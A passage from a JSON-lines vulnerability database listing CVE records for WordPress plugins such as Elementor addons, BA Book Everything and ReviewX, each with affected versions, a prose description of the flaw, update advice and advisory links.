version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664e6e2a-faa1-4609-b250-d7e94c5d5a04?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/664e6e2a-faa1-4609-b250-d7e94c5d5a04?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-membership\\\/10066554\",\"name\":\"https:\\\/\\\/codecanyon.net\\\/item\\\/wp-membership\\\/10066554\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10670","slug":"primary-addon-for-elementor","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Primary Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.6.2 via the [prim_elementor_template] shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created with Elementor that they should not have access to.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197298%40primary-addon-for-elementor&new=3197298%40primary-addon-for-elementor&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3197298%40primary-addon-for-elementor&new=3197298%40primary-addon-for-elementor&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/636bd8ce-4737-4117-9581-42c7dcb3ad22?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/636bd8ce-4737-4117-9581-42c7dcb3ad22?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12462","slug":"yogo-booking","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The YOGO Booking plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'yogo-calendar' shortcode in all versions up to, and including, 1.6.2 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yogo-booking\\\/trunk\\\/src\\\/shortcodes.php#L13\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yogo-booking\\\/trunk\\\/src\\\/shortcodes.php#L13\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yogo-booking\",\"name\":\"https:\\\/\\\/wordpress.org\\\/plugins\\\/yogo-booking\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/151b0aa9-c5c9-48ab-8b73-22ee42666824?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/151b0aa9-c5c9-48ab-8b73-22ee42666824?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3249","slug":"zita-site-library","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Zita Elementor Site Library plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the import_xml_data, xml_data_import, import_option_data, import_widgets, and import_customizer_settings functions in all versions up to, and including, 1.6.2. This makes it possible for authenticated attackers, with subscriber-level access and above, to create pages, update certain options, including WooCommerce page titles and Elementor settings, import widgets, and update the plugin's customizer settings and the WordPress custom CSS. NOTE: This vulnerability was partially fixed in version 1.6.2.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62bc3794-a2c2-4c1a-b1c9-2be6e2526635?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/62bc3794-a2c2-4c1a-b1c9-2be6e2526635?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100431\\\/zita-site-library\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3100431\\\/zita-site-library\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105478\\\/zita-site-library\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3105478\\\/zita-site-library\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2761","slug":"user-activity-log","versionEndExcluding":"1.6.3","description":"The User Activity Log WordPress plugin before 1.6.3 does not properly sanitise and escape the `txtsearch` parameter before using it in a SQL statement in some admin pages, leading to a SQL injection exploitable by high privilege users such as admin.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c82d317-f9f9-4e25-a7f1-43edb77e8aba\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/8c82d317-f9f9-4e25-a7f1-43edb77e8aba\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0909","slug":"anonymous-restricted-content","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Anonymous Restricted Content plugin for WordPress is vulnerable to information disclosure in all versions up to, and including, 1.6.2. This is due to insufficient restrictions through the REST API on the posts\/pages that protections are being place on. This makes it possible for unauthenticated attackers to access protected content.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f478ff7c-7193-4c59-a84f-c7cafff9b6c0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030199%40anonymous-restricted-content&new=3030199%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3030608%40anonymous-restricted-content&new=3030608%40anonymous-restricted-content&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12046","slug":"medical-addon-for-elementor","versionImpact":"1.6.2","versionEndExcluding":"1.6.3","description":"The Medical Addon for Elementor plugin for WordPress is vulnerable to Insecure Direct Object Reference in all versions up to, and including, 1.6.2 via the 'namedical_elementor_template' shortcode due to missing validation on a user controlled key. This makes it possible for authenticated attackers, with Contributor-level access and above, to read the content of draft, pending, and private posts.","recommendation":"Update to version 1.6.3, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L12\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/medical-addon-for-elementor\\\/trunk\\\/elementor\\\/lib\\\/lib.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230459\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3230459\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f4c4ec-bdb5-4f27-8ee3-060de9b62502?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/d5f4c4ec-bdb5-4f27-8ee3-060de9b62502?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4634","slug":"header-footer-elementor","versionImpact":"1.6.28","versionEndExcluding":"1.6.29","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018hfe_svg_mime_types\u2019 function in versions up to, and including, 1.6.28 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.29, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44bb823-bbf3-413b-82b5-a351609270bf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f44bb823-bbf3-413b-82b5-a351609270bf?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.28\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L156\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.28\\\/inc\\\/widgets-manager\\\/class-widgets-loader.php#L156\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086402\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3086402\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3609","slug":"reviewx","versionImpact":"1.6.27","versionEndExcluding":"1.6.28","description":"The ReviewX \u2013 Multi-criteria Rating & Reviews for WooCommerce plugin for WordPress is vulnerable to unauthorized deletion of data due to a missing capability check on the reviewx_remove_guest_image function in all versions up to, and including, 1.6.27. This makes it possible for authenticated attackers, with subscriber access and above, to delete attachments.","recommendation":"Update to version 1.6.28, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8152adf-1ca9-4a19-b539-39e257ab94c8?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f8152adf-1ca9-4a19-b539-39e257ab94c8?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086273%40reviewx%2Ftrunk&old=3054184%40reviewx%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3086273%40reviewx%2Ftrunk&old=3054184%40reviewx%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2619","slug":"header-footer-elementor","versionImpact":"1.6.26","versionEndExcluding":"1.6.27","description":"The Elementor Header & Footer Builder for WordPress is vulnerable to HTML Injection in all versions up to, and including, 1.6.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author-level permissions and above, to inject arbitrary HTML in pages that will be shown whenever a user accesses an injected page.","recommendation":"Update to version 1.6.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689eb95b-2f72-4aa4-9f21-6ae186346061?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/689eb95b-2f72-4aa4-9f21-6ae186346061?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L74\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L74\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L220\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.25\\\/admin\\\/class-hfe-admin.php#L220\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070659%40header-footer-elementor%2Ftrunk&old=3053177%40header-footer-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3070659%40header-footer-elementor%2Ftrunk&old=3053177%40header-footer-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2237","slug":"wp-realestate","versionImpact":"1.6.26","versionEndExcluding":"1.6.27","description":"The WP RealEstate plugin for WordPress, used by the Homeo theme, is vulnerable to authentication bypass in all versions up to, and including, 1.6.26. This is due to insufficient role restrictions in the 'process_register' function. This makes it possible for unauthenticated attackers to register an account with the Administrator role.","recommendation":"Update to version 1.6.27, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homeo-real-estate-wordpress-theme\\\/26372986#item-description__updates-history\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/homeo-real-estate-wordpress-theme\\\/26372986#item-description__updates-history\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6f7bff6-3bc3-4572-97fd-a039d54ac0ff?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/f6f7bff6-3bc3-4572-97fd-a039d54ac0ff?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-2618","slug":"header-footer-elementor","versionImpact":"1.6.26","versionEndExcluding":"1.6.26.1","description":"The Elementor Header & Footer Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the size attribute in all versions up to, and including, 1.6.26 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor access or higher, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.26.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a780ce1b-0758-42ef-88e7-ff8d921eca6e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a780ce1b-0758-42ef-88e7-ff8d921eca6e?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L494\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-page-title.php#L494\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L478\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/header-footer-elementor\\\/tags\\\/1.6.26\\\/inc\\\/widgets-manager\\\/widgets\\\/class-site-title.php#L478\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8795","slug":"ba-book-everything","versionImpact":"1.6.20","versionEndExcluding":"1.6.21","description":"The BA Book Everything plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.20. This is due to missing or incorrect nonce validation on the my_account_update() function. This makes it possible for unauthenticated attackers to update a user's account details via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This can be leveraged to reset a user's password and gain access to their account.","recommendation":"Update to version 1.6.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b691560e-e285-467c-9d52-1620c63de1f0?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b691560e-e285-467c-9d52-1620c63de1f0?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L203\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L203\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L562\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L562\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152728%40ba-book-everything&new=3152728%40ba-book-everything&sfp_email=&sfph_mail=#file3\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3152728%40ba-book-everything&new=3152728%40ba-book-everything&sfp_email=&sfph_mail=#file3\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8794","slug":"ba-book-everything","versionImpact":"1.6.20","versionEndExcluding":"1.6.21","description":"The BA Book Everything plugin for WordPress is vulnerable to arbitrary password reset in all versions up to, and including, 1.6.20. This is due to the reset_user_password() function not verifying a user's identity prior to setting a password. This makes it possible for unauthenticated attackers to reset any user's passwords, including administrators. It's important to note that the attacker will not have access to the generated password, therefore, privilege escalation is not possible.","recommendation":"Update to version 1.6.21, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e261b0e-5ca3-4f5c-acc0-41abee31b148?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4e261b0e-5ca3-4f5c-acc0-41abee31b148?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L266\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-users.php#L266\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L610\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/ba-book-everything\\\/tags\\\/1.6.20\\\/includes\\\/class-babe-my-account.php#L610\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152728\\\/ba-book-everything\\\/trunk\\\/includes\\\/class-babe-users.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3152728\\\/ba-book-everything\\\/trunk\\\/includes\\\/class-babe-users.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2020-36837","slug":"themegrill-demo-importer","versionImpact":"1.6.1","versionEndExcluding":"1.6.2","description":"The ThemeGrill Demo Importer plugin for WordPress is vulnerable to authentication bypass due to a missing capability check on the reset_wizard_actions function in versions 1.3.4 through 1.6.1. This makes it possible for authenticated attackers to reset the WordPress database. After which, if there is a user named 'admin', the attacker will become automatically logged in as an administrator.","recommendation":"Update to version 1.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c0dc694-854e-4f96-8c2d-7251c41a3ee9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/8c0dc694-854e-4f96-8c2d-7251c41a3ee9?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.webarxsecurity.com\\\/critical-issue-in-themegrill-demo-importer\\\/\",\"name\":\"https:\\\/\\\/www.webarxsecurity.com\\\/critical-issue-in-themegrill-demo-importer\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.openwall.com\\\/lists\\\/oss-security\\\/2020\\\/02\\\/19\\\/1\",\"name\":\"https:\\\/\\\/www.openwall.com\\\/lists\\\/oss-security\\\/2020\\\/02\\\/19\\\/1\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/raw.githubusercontent.com\\\/themegrill\\\/themegrill-demo-importer\\\/master\\\/CHANGELOG.txt\",\"name\":\"https:\\\/\\\/raw.githubusercontent.com\\\/themegrill\\\/themegrill-demo-importer\\\/master\\\/CHANGELOG.txt\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-2704","slug":"bp-social-connect","versionEndExcluding":"1.6.2","description":"The BP Social Connect plugin for WordPress is vulnerable to authentication bypass in versions up to, and including, 1.5. This is due to insufficient verification on the user being supplied during a Facebook login through the plugin. This makes it possible for unauthenticated attackers to log in as any existing user on the site, such as an administrator, if they have access to the email.","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44c96df2-530a-4ebe-b722-c606a7b135f9?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/44c96df2-530a-4ebe-b722-c606a7b135f9?source=cve\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L138\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L138\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L188\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/bp-social-connect\\\/tags\\\/1.5\\\/includes\\\/social\\\/facebook\\\/class.facebook.php#L188\",\"refsource\":\"MISC\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2914042%40bp-social-connect%2Ftrunk&old=1904372%40bp-social-connect%2Ftrunk&sfp_email=&sfph_mail=#file6\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=2914042%40bp-social-connect%2Ftrunk&old=1904372%40bp-social-connect%2Ftrunk&sfp_email=&sfph_mail=#file6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13465","slug":"ablocks","versionImpact":"1.6.1","versionEndExcluding":"1.6.2","description":"The aBlocks \u2013 WordPress Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \"Table Of Content\" Block, specifically in the \"markerView\" attribute, in all versions up to, and including, 1.6.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236611%40ablocks&new=3236611%40ablocks&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&old=3236611%40ablocks&new=3236611%40ablocks&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdb6632-d579-4650-b058-da10201cca8c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/abdb6632-d579-4650-b058-da10201cca8c?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4409","slug":"wp-vipergb","versionImpact":"1.6.1","versionEndExcluding":"1.6.2","description":"The WP-ViperGB plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.6.1. This is due to missing or incorrect nonce validation when saving plugin settings. This makes it possible for unauthenticated attackers to change the plugin's settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.6.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e86581bd-94c3-4b05-9590-ca3b62073703?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e86581bd-94c3-4b05-9590-ca3b62073703?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3091230%40wp-vipergb%2Ftrunk&old=2812759%40wp-vipergb%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3091230%40wp-vipergb%2Ftrunk&old=2812759%40wp-vipergb%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-50896","slug":"weforms","versionEndExcluding":"1.6.18","description":"Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in weForms weForms \u2013 Easy Drag & Drop Contact Form Builder For WordPress allows Stored XSS.This issue affects weForms \u2013 Easy Drag & Drop Contact Form Builder For WordPress: from n\/a through 1.6.17.\n\n","refs":"[{\"url\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/weforms\\\/wordpress-weforms-plugin-1-6-17-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"name\":\"https:\\\/\\\/patchstack.com\\\/database\\\/vulnerability\\\/weforms\\\/wordpress-weforms-plugin-1-6-17-cross-site-scripting-xss-vulnerability?_s_id=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3494","slug":"mesmerize-companion","versionImpact":"1.6.148","versionEndExcluding":"1.6.149","description":"The Mesmerize Companion plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mesmerize_contact_form' shortcode in all versions up to, and including, 1.6.148 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.6.149, or a newer patched 